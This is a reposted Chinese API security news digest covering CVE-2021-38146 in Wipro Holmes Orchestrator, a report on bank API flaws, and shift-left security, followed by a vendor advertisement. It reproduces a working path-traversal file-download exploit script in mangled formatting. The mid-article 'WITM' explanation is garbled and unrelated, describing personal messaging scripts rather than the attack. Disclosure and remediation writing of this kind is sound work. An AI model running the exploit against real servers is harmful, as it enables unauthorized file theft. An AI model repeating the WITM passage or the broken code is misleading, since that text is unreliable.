API NEWS | 国际最新漏洞分析及API安全报道解读

渗透技巧 2年前 (2021) admin
775 0 0

API NEWS | 国际最新漏洞分析及API安全报道解读


欢迎大家围观小阑精心整理的API安全最新资讯,在这里你能看到最专业、最前沿的API安全技术和产业资讯,我们提供关于全球API安全资讯与信息安全深度观察。

本周,我们带来的资讯如下:

•  人工智能平台Wipro Holmes Orchestrator的漏洞细节,该漏洞允许攻击者通过路径操纵下载任意文件。

•  研究人员Alissa Knight发布一份关于银行、加密货币交易和金融科技领域API漏洞的新报告。

•  一篇关于安全左移对API安全影响的文章。


漏洞分析

Wipro Holmes Orchestrator任意文件下载漏洞


本周披露了人工智能平台Wipro Holmes Orchestrator的一个漏洞,详见公告,该漏洞被跟踪为CVE-2021-38146。


【CVE-2021-38146拓展】

Wipro Holmes Orchestrator 20.4.1中的文件下载API存在漏洞,远程攻击者可通过/home/download POST数据中的SearchString JSON字段中的绝对路径遍历以读取任意文件。


该漏洞是由研究人员Rizal Muhammed所发现的,他展示了一个Python脚本来演示该漏洞。该方法相对简单,但是攻击者可通过操纵API调用的请求参数从目标下载任意文件,如下所示:请求体字段SearchString是一个用户提供的值,可指定需要下载的目标文件。
import requests as rqimport argparseport = 8001    # change port if application is running on different portdef file_download(host, filepath):  vuln_url = "http://%s:%s/home/download" % (host, port)  data = {    "SearchString": filepath,    "Msg"""  }  hdr = {    "content-type""application/json"  }  resp = rq.post(vuln_url, headers=hdr, json=data)  print resp.textdef main():  parser = argparse.ArgumentParser(      description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",      epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"    )  parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)  parser.add_argument("-f","--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")  args = parser.parse_args()  if "\" in args.file_path:    fp = args.file_path.replace("\""/")  else:    fp = args.file_path  file_download(args.target_ip, fp)if __name__ == "__main__":  main()
不幸的是,目标系统并未通过将路径限制在固定位置来限制提供的路径,因此攻击者可以提供任意路径。


此处的关键是:永远不要信任用户提供的输入,如本例中的文件路径。始终采用易于理解和经过测试的模式来防止路径遍历。通常,路径中提供的任何相对路径说明符都将被剥离,而剩下的路径将锚定到一个已知目录,与PortSwigger在其文件路径遍历的文章中所描述的一致。


报告解读

银行和金融科技API漏洞


安全研究员Alissa Knight最近发布了一份新的研究报告,“焦土:黑客银行API”。她在这份报告中详细介绍了银行、加密货币交易和金融科技领域的漏洞。

点击文末左下角“阅读原文”可查看“焦土:黑客银行API”报告


Scorched Earth 拓展

焦土政策(Scorched-earth Policy,又称焦土作战)是一种军事战略。

原意:此战略包括当敌人进入或撤出某处时破坏任何可能对敌人有用的东西。这个战术辞汇在现代使用上并不限于使敌人食物缺乏,还可以包括破坏遮蔽所、交通运输、通讯与工业资源。

引申意:现代企业竞争中将其引申为目标公司大量出售公司资产,或者破坏公司的特性,以挫败敌意收购人的收购意图,是公司的主动性反收购措施,是一种两败俱伤的策略。


在研究中, Knight能够通过55家银行的API对其进行访问,改变客户的PIN码,并在他们的账户之间进行资金转移。她发现的漏洞包括:

•  硬编码的API密钥和令牌,包括用户名和密码

•  中间人(WITM)攻击漏洞

•  API1:2019 -几乎所有被测试的API中都存在失效的对象级授权

•  API2:2019 -身份认证失败漏洞

•  开发外包给第三方带来的系统问题


woman-in-the-middle (WITM) attacks拓展

在服务器上,每个人都有自己处理消息的自动脚本表达:对劳伦来说是WITM(中间人),对凯尔来说是MITM(中间人)。WITM和MITM能够在发送或接收消息时修改消息,回复消息,但无法修改或转发消息。发起新对话无需劳伦或凯尔作出任何行动。通过这个过程,我们希望同步我们之间的不同沟通方式,发展更好的关系和对话。我们使用该系统,更新MITM和WITM的代码,为期6个月。


根据报告来看,Knight完美地捕捉到了此处的重点:

认证和授权显然都不完备,但是目前,这些第三方开发者暂时不会考虑这些问题。


观点呈现

对API安全来说,左移的意义何在?


来介绍《SD Times》上发表的一篇文章,该文章讨论左移法对API安全的意义。

将OpenAPI规范(OAS)视为“唯一真理”,先进的开发、安全和运营团队通过将安全构造嵌入到他们的OpenAPI定义中以对其进行左移,然后通过CI/CD管道使用自动化将安全直接嵌入和注入到API中。开发人员面临的关键挑战是完全接受“设计优先”的API设计理念。

理想情况下,采用这种向左偏移的方法可允许开发团队和安全团队共同实现安全——找到实现安全的万能法则是每个人的责任。


最佳实践

星阑科技萤火安全分析平台


星阑科技产品——萤火 (API Intelligence) 拥有不同应用场景的解决方案,适配服务器、容器集群、微服务架构以及云平台等多种架构。可以实现对API使用情况的实时监控,异常访问的可视化。对流量中的API自动聚合、分类、自定义标签化管理;并以树状图的方式便于管理员进行探索和调查,从而实现API统一管控,平台自推出以来已经服务于多个行业的典型API数字化应用场景。


感谢 APIsecurity.io 提供相关内容



往期 · 推荐


API NEWS | 国际最新漏洞分析及API安全报道解读
API NEWS | 国际最新漏洞分析及API安全报道解读

API NEWS | 国际最新漏洞分析及API安全报道解读


API NEWS | 国际最新漏洞分析及API安全报道解读

原文始发于微信公众号(星阑科技):API NEWS | 国际最新漏洞分析及API安全报道解读

版权声明:admin 发表于 2021年12月3日 上午9:43。
转载请注明:API NEWS | 国际最新漏洞分析及API安全报道解读 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...